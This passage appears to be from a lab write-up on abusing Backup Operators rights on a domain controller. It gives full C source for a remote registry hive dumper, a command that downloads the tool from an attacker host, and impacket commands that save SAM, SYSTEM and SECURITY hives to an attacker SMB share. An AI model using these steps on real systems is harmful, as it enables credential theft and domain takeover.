We now have the credentials of “Backup Admins” which are in the “Backup Operators” group. If we do not have a shell on the target system though.
One way to still proceed is a great tool by who4m1:
https://github.com/Wh04m1001/Random/blob/main/BackupOperators.cpp
#include <stdio.h>
#include <Windows.h>
void MakeToken() {
HANDLE token;
const char username[] = "<username>";
const char password[] = "<password>";
const char domain[] = "<domain>";
if (LogonUserA(username, domain, password, LOGON32_LOGON_NEW_CREDENTIALS, LOGON32_PROVIDER_DEFAULT, &token) == 0) {
printf("LogonUserA: %d\n", GetLastError());
exit(0);
}
if (ImpersonateLoggedOnUser(token) == 0) {
printf("ImpersonateLoggedOnUser: %d\n", GetLastError());
exit(0);
}
}
int main()
{
HKEY hklm;
HKEY hkey;
DWORD result;
const char* hives[] = { "SAM","SYSTEM","SECURITY" };
const char* files[] = { "C:\\windows\\temp\\sam.hive","C:\\windows\\temp\\system.hive","C:\\windows\\temp\\security.hive" };
//Uncomment if using alternate credentials.
//MakeToken();
result = RegConnectRegistryA("\\\\<computername>", HKEY_LOCAL_MACHINE,&hklm);
if (result != 0) {
printf("RegConnectRegistryW: %d\n", result);
exit(0);
}
for (int i = 0; i < 3; i++) {
printf("Dumping %s hive to %s\n", hives[i], files[i]);
result = RegOpenKeyExA(hklm, hives[i], REG_OPTION_BACKUP_RESTORE | REG_OPTION_OPEN_LINK, KEY_READ, &hkey);
if (result != 0) {
printf("RegOpenKeyExA: %d\n", result);
exit(0);
}
result = RegSaveKeyA(hkey, files[i], NULL);
if (result != 0) {
printf("RegSaveKeyA: %d\n", result);
exit(0);
}
}
}
This allows us to connect to the remote registry and use our Backup Operators privileges to copy out SAM/SYSTEM/SECURITY from DC to another machine. In order to use the tool we compile it with Visual Studio & upload it to anther machine. Then we dump the files from the registry on the dc, to “\windows\temp” on the dc:
iwr <http://10.8.0.2/SeRemoteBackup.exe> -outfile SeRemoteBackup.exe
.\SeRemoteBackup.exe
Dumping SAM hive to C:\windows\temp\sam.hive
Dumping SYSTEM hive to C:\windows\temp\system.hive
Dumping SECURITY hive to C:\windows\temp\security.hive
OR
Using reg.py from impacket which is for querying remote registry, we can dump SAM, SYSTEM and SECURITY files from registry hive
reg.py lustrous.vl/tony.ward:[email protected] save -keyName 'HKLM\SAM' -o '\\10.8.0.27\smb'
reg.py lustrous.vl/tony.ward:[email protected] save -keyName 'HKLM\SYSTEM' -o '\\10.8.0.27\smb'
reg.py lustrous.vl/tony.ward:[email protected] save -keyName 'HKLM\SECURITY' -o '\\10.8.0.27\smb'

impacket-smbserver -smb2support smb .
